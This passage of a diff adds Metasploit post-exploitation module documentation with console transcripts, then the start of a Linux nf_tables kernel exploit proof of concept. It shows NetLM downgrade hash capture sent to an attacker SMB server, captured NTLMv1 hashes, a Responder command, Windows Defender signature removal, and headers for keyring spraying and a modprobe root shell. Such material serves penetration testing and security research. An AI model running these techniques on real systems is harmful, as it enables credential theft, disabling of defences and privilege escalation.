+ AudioEndpointBuilder            LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ AudioSrv                        NT AUTHORITY\LocalService    Manual    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
+ BFE                             NT AUTHORITY\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
+ BITS                            LocalSystem                  Auto      C:\Windows\System32\svchost.exe -k netsvcs
+ Browser                         LocalSystem                  Disabled  C:\Windows\System32\svchost.exe -k netsvcs
+ COMSysApp                       LocalSystem                  Manual    C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
+ CertPropSvc                     LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ CryptSvc                        NT Authority\NetworkService  Auto      C:\Windows\system32\svchost.exe -k NetworkService
+ CscService                      LocalSystem                  Disabled  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ DFSR                            LocalSystem                  Auto      C:\Windows\system32\DFSRs.exe
+ DNS                             LocalSystem                  Auto      C:\Windows\system32\dns.exe
+ DPS                             NT AUTHORITY\LocalService    Auto      C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork
+ DcomLaunch                      LocalSystem                  Auto      %SystemRoot%\system32\svchost.exe -k DcomLaunch
+ Dfs                             LocalSystem                  Auto      C:\Windows\system32\dfssvc.exe
+ Dhcp                            NT Authority\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
+ Dnscache                        NT AUTHORITY\NetworkService  Auto      C:\Windows\system32\svchost.exe -k NetworkService
+ EapHost                         localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ EventLog                        NT AUTHORITY\LocalService    Auto      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
+ EventSystem                     NT AUTHORITY\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalService
+ FCRegSvc                        NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
+ FDResPub                        NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ IKEEXT                          LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ IPBusEnum                       LocalSystem                  Disabled  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+ IsmServ                         LocalSystem                  Auto      C:\Windows\System32\ismserv.exe
+ KeyIso                          LocalSystem                  Manual    C:\Windows\system32\lsass.exe
+ KtmRm                           NT AUTHORITY\NetworkService  Auto      C:\Windows\System32\svchost.exe -k NetworkService
+ LanmanServer                    LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ LanmanWorkstation               NT AUTHORITY\LocalService    Auto      C:\Windows\System32\svchost.exe -k LocalService
+ MMCSS                           LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ MSDTC                           NT AUTHORITY\NetworkService  Auto      C:\Windows\System32\msdtc.exe
+ MSiSCSI                         LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ MpsSvc                          NT Authority\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
+ Netlogon                        LocalSystem                  Auto      C:\Windows\system32\lsass.exe
+ Netman                          LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ NlaSvc                          NT AUTHORITY\NetworkService  Auto      C:\Windows\System32\svchost.exe -k NetworkService
+ NtFrs                           LocalSystem                  Auto      C:\Windows\system32\ntfrs.exe
+ PerfHost                        NT AUTHORITY\LocalService    Manual    C:\Windows\SysWow64\perfhost.exe
+ PlugPlay                        LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k DcomLaunch
+ PolicyAgent                     NT Authority\NetworkService  Auto      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
+ ProfSvc                         LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ ProtectedStorage                LocalSystem                  Manual    C:\Windows\system32\lsass.exe
+ RSoPProv                        LocalSystem                  Manual    C:\Windows\system32\RSoPProv.exe
+ RasAuto                         localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ RasMan                          localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ RemoteAccess                    localSystem                  Disabled  C:\Windows\System32\svchost.exe -k netsvcs
+ RemoteRegistry                  NT AUTHORITY\LocalService    Auto      C:\Windows\system32\svchost.exe -k regsvc
+ RpcLocator                      NT AUTHORITY\NetworkService  Manual    C:\Windows\system32\locator.exe
+ RpcSs                           NT AUTHORITY\NetworkService  Auto      %SystemRoot%\system32\svchost.exe -k rpcss
+ SCPolicySvc                     LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ SCardSvr                        NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ SENS                            LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ SLUINotify                      NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ SNMP                            LocalSystem                  Auto      C:\Windows\System32\snmp.exe
+ SNMPTRAP                        NT AUTHORITY\LocalService    Manual    C:\Windows\System32\snmptrap.exe
+ SSDPSRV                         NT AUTHORITY\LocalService    Disabled  C:\Windows\system32\svchost.exe -k LocalService
+ SamSs                           LocalSystem                  Auto      C:\Windows\system32\lsass.exe
+ Schedule                        LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ SessionEnv                      localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ SharedAccess                    LocalSystem                  Disabled  C:\Windows\System32\svchost.exe -k netsvcs
+ ShellHWDetection                LocalSystem                  Auto      C:\Windows\System32\svchost.exe -k netsvcs
+ Spooler                         LocalSystem                  Auto      C:\Windows\System32\spoolsv.exe
+ SstpSvc                         NT Authority\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ SysMain                         LocalSystem                  Disabled  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+ TBS                             NT AUTHORITY\LocalService    Auto      C:\Windows\System32\svchost.exe -k LocalService
+ THREADORDER                     NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ TapiSrv                         NT AUTHORITY\NetworkService  Manual    C:\Windows\System32\svchost.exe -k tapisrv
+ TermService                     NT Authority\NetworkService  Auto      C:\Windows\System32\svchost.exe -k NetworkService
+ Themes                          LocalSystem                  Disabled  C:\Windows\System32\svchost.exe -k netsvcs
+ TrkWks                          LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ TrustedInstaller                localSystem                  Manual    C:\Windows\servicing\TrustedInstaller.exe
+ UI0Detect                       LocalSystem                  Manual    C:\Windows\system32\UI0Detect.exe
+ UmRdpService                    localSystem                  Manual    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ UxSms                           localSystem                  Auto      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ VSS                             LocalSystem                  Manual    C:\Windows\system32\vssvc.exe
+ W32Time                         NT AUTHORITY\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalService
+ WPDBusEnum                      LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+ WcsPlugInService                NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k wcssvc
+ WdiServiceHost                  NT AUTHORITY\LocalService    Manual    C:\Windows\System32\svchost.exe -k wdisvc
+ WdiSystemHost                   LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ Wecsvc                          NT AUTHORITY\NetworkService  Manual    C:\Windows\system32\svchost.exe -k NetworkService
+ WerSvc                          localSystem                  Auto      C:\Windows\System32\svchost.exe -k WerSvcGroup
+ WinHttpAutoProxySvc             NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ WinRM                           NT AUTHORITY\NetworkService  Auto      C:\Windows\System32\svchost.exe -k NetworkService
+ Winmgmt                         localSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ clr_optimization_v2.0.50727_32  LocalSystem                  Manual    C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
+ clr_optimization_v2.0.50727_64  LocalSystem                  Manual    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
+ dot3svc                         localSystem                  Manual    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+ fdPHost                         NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ gpsvc                           LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k GPSvcGroup
+ hidserv                         LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+ hkmsvc                          localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ iphlpsvc                        LocalSystem                  Auto      C:\Windows\System32\svchost.exe -k NetSvcs
+ kdc                             LocalSystem                  Auto      C:\Windows\System32\lsass.exe
+ lltdsvc                         NT AUTHORITY\LocalService    Manual    C:\Windows\System32\svchost.exe -k LocalService
+ lmhosts                         NT AUTHORITY\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
+ msiserver                       LocalSystem                  Manual    C:\Windows\system32\msiexec /V
+ napagent                        NT AUTHORITY\NetworkService  Manual    C:\Windows\System32\svchost.exe -k NetworkService
+ netprofm                        NT AUTHORITY\LocalService    Auto      C:\Windows\System32\svchost.exe -k LocalService
+ nsi                             NT Authority\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalService
+ pla                             NT AUTHORITY\LocalService    Manual    %SystemRoot%\System32\svchost.exe -k LocalServiceNoNetwork
+ sacsvr                          LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ seclogon                        LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ slsvc                           NT AUTHORITY\NetworkService  Auto      C:\Windows\system32\SLsvc.exe
+ swprv                           LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k swprv
+ upnphost                        NT AUTHORITY\LocalService    Disabled  C:\Windows\system32\svchost.exe -k LocalService
+ vds                             LocalSystem                  Manual    C:\Windows\System32\vds.exe
+ wercplsupport                   localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ wmiApSrv                        localSystem                  Manual    C:\Windows\system32\wbem\WmiApSrv.exe
+ wuauserv                        LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ wudfsvc                         LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+
+[+] Loot file stored in: /root/.msf4/loot/20220820231513_default_192.168.200.218_windows.services_350986.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,45 @@
+## Vulnerable Application
+
+This module will enumerate the SNMP service configuration.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/enum_snmp`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+## Scenarios
+
+### Windows Server 2008 (x64)
+
+```
+msf6 > use post/windows/gather/enum_snmp
+msf6 post(windows/gather/enum_snmp) > set session 1
+session => 1
+msf6 post(windows/gather/enum_snmp) > run
+
+[*] Running module against WIN-17B09RRRJTG (192.168.200.218)
+[*] Checking if SNMP service is installed
+[*] 	SNMP is installed!
+[*] Enumerating community strings
+[*] 
+[*] 	Community Strings
+[*] 	=================
+[*] 	
+[*] 	 Name    Type
+[*] 	 ----    ----
+[*] 	 secret  READ & WRITE
+[*] 	 test    READ ONLY
+[*] 
+[*] Enumerating Permitted Managers for Community Strings
+[*] 	SNMP packets are accepted from any host
+[*] Enumerating Trap configuration
+[*] Community Name: test
+[*] 	Destination: 127.0.0.1
+[*] 	Destination: snmp.local
+[*] Post module execution completed
+```
@@ -0,0 +1,49 @@
+## Vulnerable Application
+
+This module enumerates Domain Admin account processes and delegation tokens.
+
+This module will first check if the session has sufficient privileges
+to replace process level tokens and adjust process quotas.
+
+The SeAssignPrimaryTokenPrivilege privilege will not be assigned if
+the session has been elevated to SYSTEM. In that case try first
+migrating to another process that is running as SYSTEM.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a Meterpreter session on a Windows target on a domain
+1. Do: `use post/windows/gather/enum_tokens`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should receive a list of Domain Admin account processes and delegation tokens
+
+
+## Options
+
+### GETSYSTEM
+
+Attempt to get SYSTEM privilege on the target host. (default: `true`)
+
+
+## Scenarios
+
+### Local Administrator session on Windows Server 2008 SP1 (x64)
+
+```
+msf6 post(windows/gather/enum_tokens) > set session 1
+session => 1
+msf6 post(windows/gather/enum_tokens) > set getsystem false
+getsystem => false
+msf6 post(windows/gather/enum_tokens) > run
+
+[*] Running module against WIN-17B09RRRJTG (192.168.200.218)
+[+] Found token for session 1 (192.168.200.218) - Administrator (Delegation Token)
+[+] Found process on session 1 (192.168.200.218) - Administrator (PID: 3344) (cmd.exe)
+[+] Found process on session 1 (192.168.200.218) - Administrator (PID: 2420) (calc.exe)
+[+] Found process on session 1 (192.168.200.218) - Administrator (PID: 2220) (reverse.x64.1337.exe)
+[+] Found token for session 1 (192.168.200.218) - corpadmin (Delegation Token)
+[+] Found process on session 1 (192.168.200.218) - corpadmin (PID: 1764) (cmd.exe)
+[*] Post module execution completed
+```
@@ -0,0 +1,100 @@
+## Vulnerable Application
+
+This module changes the system `LmCompatibilityLevel` registry value
+to enable sending LM challenge hashes and initiates a SMB connection
+to the host specified in the SMBHOST module option. If an SMB server
+is listening, it will receive the NetLM hashes for the session user.
+
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/netlm_downgrade`
+4. Do: `set SESSION <session id>`
+5. Start a SMB server to capture hashes
+6. Do: `set SMBHOST <SMB server IP address>`
+7. Do: `run`
+
+## Options
+
+
+### SMBHOST
+
+IP address of SMB server to capture hashes.
+
+
+## Scenarios
+
+### Windows 11 Pro 10.0.22000 Build 22000 x64
+
+```
+msf6 > use auxiliary/server/capture/smb
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 2.
+
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+msf6 auxiliary(server/capture/smb) > use post/windows/gather/netlm_downgrade 
+msf6 post(windows/gather/netlm_downgrade) > set session 1
+session => 1
+msf6 post(windows/gather/netlm_downgrade) > run
+
+[*] Running module against WINDEV2110EVAL (192.168.200.140)
+[*] NetLM authentication is disabled (LmCompatibilityLevel: nil). Enabling ...
+[+] NetLM authentication is enabled
+[*] Establishing SMB connection to 192.168.200.130
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv1-SSP Client     : 192.168.200.140
+[SMB] NTLMv1-SSP Username   : WINDEV2110EVAL\User
+[SMB] NTLMv1-SSP Hash       : User::WINDEV2110EVAL:414a0d26193abde800000000000000000000000000000000:44d90728eeb025c1dcf4730a0282422614cbc8e590e99a11:b0e33cde858f04d5
+
+[+] SMB server 192.168.200.130 should now have NetLM hashes
+[*] Restoring original LM compatibility level (LmCompatibilityLevel: nil)
+[*] Post module execution completed
+msf6 post(windows/gather/netlm_downgrade) > 
+```
+
+### Windows Server 2008 SP1 (x64)
+
+```
+msf6 > use auxiliary/server/capture/smb
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 2.
+
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+msf6 auxiliary(server/capture/smb) > use post/windows/gather/netlm_downgrade 
+msf6 post(windows/gather/netlm_downgrade) > set smbhost 192.168.200.130
+smbhost => 192.168.200.130
+msf6 post(windows/gather/netlm_downgrade) > set session 1
+session => 1
+msf6 post(windows/gather/netlm_downgrade) > run
+
+[*] Running module against WIN-17B09RRRJTG (192.168.200.218)
+[*] NetLM authentication is disabled (LmCompatibilityLevel: 3). Enabling ...
+[+] NetLM authentication is enabled (LmCompatibilityLevel: 0)
+[*] Establishing SMB connection to 192.168.200.130
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv1-SSP Client     : 192.168.200.218
+[SMB] NTLMv1-SSP Username   : CORP\corpadmin
+[SMB] NTLMv1-SSP Hash       : corpadmin::CORP:de7f490cc7f7f8a700000000000000000000000000000000:8a34755c17fdbd4f1d7338b5ed7617e2000f071f05869f2e:c30fd80a6709381b
+
+[+] SMB server 192.168.200.130 should now have NetLM hashes
+[*] Restoring original LM compatibility level (LmCompatibilityLevel: 3)
+[*] Post module execution completed
+msf6 post(windows/gather/netlm_downgrade) > 
+```
+
+Alternatively, the SMB connection can captured using [Responder](https://github.com/lgandx/Responder):
+
+```
+$ sudo responder -A -I eth0 --lm -v
+
+[...]
+
+[SMB] NTLMv1 Client   : 192.168.200.218
+[SMB] NTLMv1 Username : CORP\corpadmin
+[SMB] NTLMv1 Hash     : corpadmin::CORP:3FFCF0AED51EF9784B17BF71859355CA0FF968A42BF925D4:3FFCF0AED51EF9784B17BF71859355CA0FF968A42BF925D4:07168acbca2d7e8e
+```
+
@@ -0,0 +1,51 @@
+## Vulnerable Application
+
+This module executes WMIC commands on the specified host.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a Meterpreter session on a Windows target
+1. Do: `use post/windows/gather/wmic_command`
+1. Do: `set session [#]`
+1. Do: `set command [wmic command]`
+1. Do: `run`
+1. You should receive WMIC command output
+
+
+## Options
+
+### RESOURCE
+
+Full path to resource file containing WMIC commands.
+
+### COMMAND
+
+WMIC command.
+
+
+## Scenarios
+
+### Windows Server 2008 SP1 (x64)
+
+```
+msf6 > use post/windows/gather/wmic_command
+msf6 post(windows/gather/wmic_command) > set session 1
+session => 1
+msf6 post(windows/gather/wmic_command) > set command os
+command => os
+msf6 post(windows/gather/wmic_command) > run
+
+[*] Running module against WIN-17B09RRRJTG (192.168.200.218)
+[*] Running WMIC command: os
+[*] Command output saved to: /root/.msf4/loot/20220922071306_default_192.168.200.218_host.command.wmi_789917.txt
+[*] Post module execution completed
+msf6 post(windows/gather/wmic_command) > cat /root/.msf4/loot/20220922071306_default_192.168.200.218_host.command.wmi_789917.txt
+[*] exec: cat /root/.msf4/loot/20220922071306_default_192.168.200.218_host.command.wmi_789917.txt
+
+BootDevice               BuildNumber  BuildType            Caption                                     CodeSet  CountryCode  CreationClassName      CSCreationClassName   CSDVersion      CSName           CurrentTimeZone  DataExecutionPrevention_32BitApplications  DataExecutionPrevention_Available  DataExecutionPrevention_Drivers  DataExecutionPrevention_SupportPolicy  Debug  Description  Distributed  EncryptionLevel  ForegroundApplicationBoost  FreePhysicalMemory  FreeSpaceInPagingFiles  FreeVirtualMemory  InstallDate                LargeSystemCache  LastBootUpTime             LocalDateTime              Locale  Manufacturer           MaxNumberOfProcesses  MaxProcessMemorySize  MUILanguages  Name                                                                                 NumberOfLicensedUsers  NumberOfProcesses  NumberOfUsers  OperatingSystemSKU  Organization  OSArchitecture  OSLanguage  OSProductSuite  OSType  OtherTypeDescription  PAEEnabled  PlusProductID  PlusVersionNumber  Primary  ProductType  QuantumLength  QuantumType  RegisteredUser  SerialNumber             ServicePackMajorVersion  ServicePackMinorVersion  SizeStoredInPagingFiles  Status  SuiteMask  SystemDevice             SystemDirectory      SystemDrive  TotalSwapSpaceSize  TotalVirtualMemorySize  TotalVisibleMemorySize  Version   WindowsDirectory  
+\Device\HarddiskVolume1  6001         Multiprocessor Free  Microsoft� Windows Server� 2008 Enterprise  1252     1            Win32_OperatingSystem  Win32_ComputerSystem  Service Pack 1  WIN-17B09RRRJTG  600              TRUE                                       TRUE                               TRUE                             3                                      FALSE               FALSE        256              2                           507164              1354124                 1788752            20220722133039.000000+600                    20220922115509.500000+600  20220922211154.399000+600  0409    Microsoft Corporation  -1                    8589934464            {"en-US"}     Microsoft� Windows Server� 2008 Enterprise |C:\Windows|\Device\Harddisk0\Partition1                         47                 4              10                                64-bit          1033        274             18                                                                          TRUE     2            1              1            Windows User    92516-083-1766663-76902  1                        0                        1354124                  OK      274        \Device\HarddiskVolume1  C:\Windows\system32  C:                               2358168                 1046924                 6.0.6001  C:\Windows        
+
+msf6 post(windows/gather/wmic_command) > 
+```
@@ -1,81 +1,122 @@
-
+## Vulnerable Application
+### Overview
 This module requires system privs

-This module rolls back the signatures in windows defender to the
-earliest signatures.  The level of protection is somewhat indeterminate.
+This module rolls back the signatures in Windows Defender to the
+earliest signatures. The level of protection is somewhat indeterminate.
 This action is accomplished by running the command:
 `MpCmdRun.exe -RemoveDefinitions -All`

-To recover, you can run
-`MpCmdRun.exe -UpdateSignatures`
-That will force defender to update the signatures to the latest version
-from 
+To recover, you can run `MpCmdRun.exe -UpdateSignatures`.
+That will force Windows Defender to update the signatures
+to the latest version available from Microsoft.

+## Verification Steps
+1. Get a Meterpreter session as the `NT AUTHORITY\SYSTEM` user.
+1. `use post/windows/manage/rollback_defender_signatures`
+1. `set SESSION <ID of Meterpreter session>`
+1. Optionally set the ACTION to run with `set ACTION <action to run>`
+1. `run`

-###Vulnerable Applications
-Windows defender is the target, though this is a feature
+## Options
+### ACTION
+#### ROLLBACK
+Rolls the Windows Defender signature definitions back to the earliest available signatures.

-###Verification Steps
+### UPDATE
+Updates the Windows Defender signature definitions to the latest versions available from Microsoft.
+
+## Scenarios
+### ROLLBACK Action on Windows Server 2022
 ```
-msf5 post(windows/manage/rollback_defender_signatures) > sessions -i -1
-[*] Starting interaction with 3...
+msf6 > sessions

-meterpreter > sysinfo
-Computer        : WIN-5ADJK2NT7IJ
-OS              : Windows 7 (Build 7600).
-Architecture    : x64
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 2
-Meterpreter     : x64/windows
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > background
-[*] Backgrounding session 3...
-msf5 post(windows/manage/rollback_defender_signatures) > show options
+Active sessions
+===============
+
+  Id  Name  Type                     Information                            Connection
+  --  ----  ----                     -----------                            ----------
+  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-BR0CCBA815B  172.28.94.235:45437 -> 172.28.82.203:4444 (172.28
+                                                                            .82.203)
+
+msf6 > use post/windows/manage/rollback_defender_signatures 
+msf6 post(windows/manage/rollback_defender_signatures) > set SESSION 1 
+SESSION => 1
+msf6 post(windows/manage/rollback_defender_signatures) > show options

 Module options (post/windows/manage/rollback_defender_signatures):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
-   ACTION   Update           yes       Action to perform (Update/Rollback) (Accepted: Rollback, Update)
-   SESSION  3                yes       The session to run this module on.
+   SESSION  1                yes       The session to run this module on

-msf5 post(windows/manage/rollback_defender_signatures) > set action rollback
-action => rollback
-msf5 post(windows/manage/rollback_defender_signatures) > set verbose true
-verbose => true
-msf5 post(windows/manage/rollback_defender_signatures) > show options

-Module options (post/windows/manage/rollback_defender_signatures):
+Post action:

-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   ACTION   rollback         yes       Action to perform (Update/Rollback) (Accepted: rollback, update)
-   SESSION  3                yes       The session to run this module on.
+   Name      Description
+   ----      -----------
+   ROLLBACK  Rollback Defender signatures

-msf5 post(windows/manage/rollback_defender_signatures) > run

-[*] program_path = C:\Program Files
-[*] file_path = C:\Program Files\Windows Defender\MpCmdRun.exe
-[*] Removing All Definitions for Windows Defender
-[*] rollback
+msf6 post(windows/manage/rollback_defender_signatures) > run
+
+[*] Removing all definitions for Windows Defender
 [*] Running cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
 [*] 
-Service Version: 6.1.7600.16385
-Engine Version: 1.1.15400.5
-AntiSpyware Signature Version: 1.281.1013.0e[*] Post module execution completed
+Service Version: 4.18.2207.7
+Engine Version: 1.1.19600.3
+AntiSpyware Signature Version: 1.375.652.0
+AntiVirus Signature Version: 1.375.652.0
+
+Starting engine and signature rollback to none...
+Done!
+[*] Post module execution completed
+msf6 post(windows/manage/rollback_defender_signatures) > 
+```
+
+## UPDATE Action on Windows Server 2022
+```
+msf6 > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                            Connection
+  --  ----  ----                     -----------                            ----------
+  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-BR0CCBA815B  172.28.94.235:45437 -> 172.28.82.203:4444 (172.28
+                                                                            .82.203)
+
+msf6 > use post/windows/manage/rollback_defender_signatures 
+msf6 post(windows/manage/rollback_defender_signatures) > set SESSION 1 
+SESSION => 1
+msf6 post(windows/manage/rollback_defender_signatures) > set ACTION UPDATE 
+ACTION => UPDATE
+msf6 post(windows/manage/rollback_defender_signatures) > show options

-### Options
 Module options (post/windows/manage/rollback_defender_signatures):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
-   ACTION   rollback         yes       Action to perform (Update/Rollback) (Accepted: rollback, update)
-   SESSION  3                yes       The session to run this module on.
+   SESSION  1                yes       The session to run this module on

-Session is standard
-ACTION is what you would like to do.  Rollback rolls the definitions
-back to the original, update updates the signatures.  In theory, on
-a normal system, rollback will push to old definitions, and update will
-return the definitions.
+
+Post action:
+
+   Name    Description
+   ----    -----------
+   UPDATE  Update Defender signatures
+
+
+msf6 post(windows/manage/rollback_defender_signatures) > run
+
+[*] Updating definitions for Windows Defender
+[*] Running cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate
+[*] Signature update started . . .
+Service Version: 4.18.2207.7
+Engine Version: 1.1.19600.3
+AntiSpyware Signature Version: 1.375.652.0
+AntiVirus Signature Version: 1.375.652.0
+Signature update finished. No updates needed
+[*] Post module execution completed
+msf6 post(windows/manage/rollback_defender_signatures) > 
+```
@@ -0,0 +1,30 @@
+.PHONY: all debug clean
+
+TARGET=ubuntu.elf
+
+SOURCES = $(wildcard src/*.c)
+HEADERS = $(wildcard inc/*.h)
+OBJECTS = $(patsubst src/%.c,obj/%.o,$(SOURCES))
+
+CFLAGS= -I./inc
+CFLAGS += -Os
+LDFLAGS= -pthread -static
+
+all: obj $(TARGET)
+
+debug: CFLAGS += -DDEBUG
+debug: $(TARGET)
+
+$(TARGET): $(OBJECTS)
+	$(CC) $(LDFLAGS) -o $@ $^
+	strip $@
+
+obj/%.o: src/%.c
+	$(CC) -c $< -o $@ $(CFLAGS)
+
+obj:
+	mkdir obj
+
+clean:
+	rm -rf obj
+	rm -f $(TARGET)
@@ -0,0 +1,16 @@
+# Netfilter tables API heap buffer overflow
+
+PoC of the exploitation of a heap buffer overflow in the linux kernel.
+Available for Linux 5.18-rc3
+The concerned function is `nft_add_set_elem` in `net/netfilter/nf_tables_api.c`
+
+## Build
+
+```sh
+make
+```
+
+If you want a verbose version of this PoC, you can build it with
+```sh
+make debug
+```
@@ -0,0 +1,40 @@
+#ifndef _KEYRING_H_
+#define _KEYRING_H_
+
+#include <stdint.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#define KEY_DESC_MAX_SIZE 40
+
+#define PREFIX_BUF_LEN 16
+#define RCU_HEAD_LEN 16
+
+#define SPRAY_KEY_SIZE 50
+
+struct keyring_payload {
+    uint8_t prefix[PREFIX_BUF_LEN];
+    uint8_t rcu_buf[RCU_HEAD_LEN];
+    unsigned short len;
+};
+
+struct leak {
+    long kaslr_base;
+    long physmap_base;
+};
+
+typedef int32_t key_serial_t;
+
+static inline key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) {
+    return syscall(__NR_add_key, type, description, payload, plen, ringid);
+}
+
+static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) {
+    return syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5);
+}
+
+key_serial_t *spray_keyring(uint32_t spray_size);
+struct leak *get_keyring_leak(key_serial_t *id_buffer, uint32_t id_buffer_size);
+void release_keys(key_serial_t *id_buffer, uint32_t id_buffer_size);
+
+#endif /* _KEYRING_H_ */
@@ -0,0 +1,8 @@
+#ifndef _LOG_H_
+#define _LOG_H_
+
+#include <stdlib.h>
+
+#define do_error_exit(msg) do {perror("[-] " msg); exit(EXIT_FAILURE); } while(0)
+
+#endif /* _LOG_H_ */
@@ -0,0 +1,8 @@
+#ifndef _MODPROBE_H_
+#define _MODPROBE_H_
+
+void setup_modprobe_payload(char*);
+void get_root_shell(void);
+void prepare_root_shell(char*);
+
+#endif /* _MODPROBE_H_ */
@@ -0,0 +1,28 @@
+#ifndef _NETLINK_H_
+#define _NETLINK_H_
+
+#include <stdint.h>
+#include <linux/netlink.h>
+
+/* Netlink messages */
+
+#define NETLINK_RECEIVE_BUFFER_SIZE 4096
+
+struct nlmsghdr *get_batch_begin_nlmsg(void);
+struct nlmsghdr *get_batch_end_nlmsg(void);
+
+/* Netlink attributes */
+
+#define U32_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint32_t))
+#define U64_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint64_t))
+#define S8_NLA_SIZE (sizeof(struct nlattr) + 8)
+#define NLA_BIN_SIZE(x) (sizeof(struct nlattr) + x)
+#define NLA_ATTR(attr) ((void *)attr + NLA_HDRLEN)
+
+struct nlattr *set_nested_attr(struct nlattr *attr, uint16_t type, uint16_t data_len);
+struct nlattr *set_u32_attr(struct nlattr *attr, uint16_t type, uint32_t value);
+struct nlattr *set_u64_attr(struct nlattr *attr, uint16_t type, uint64_t value);
+struct nlattr *set_str8_attr(struct nlattr *attr, uint16_t type, const char name[8]);
+struct nlattr *set_binary_attr(struct nlattr *attr, uint16_t type, uint8_t *buffer, uint64_t buffer_size);
+
+#endif /* _NETLINK_H_ */
@@ -0,0 +1,14 @@
+#ifndef _NF_TABLES_H_
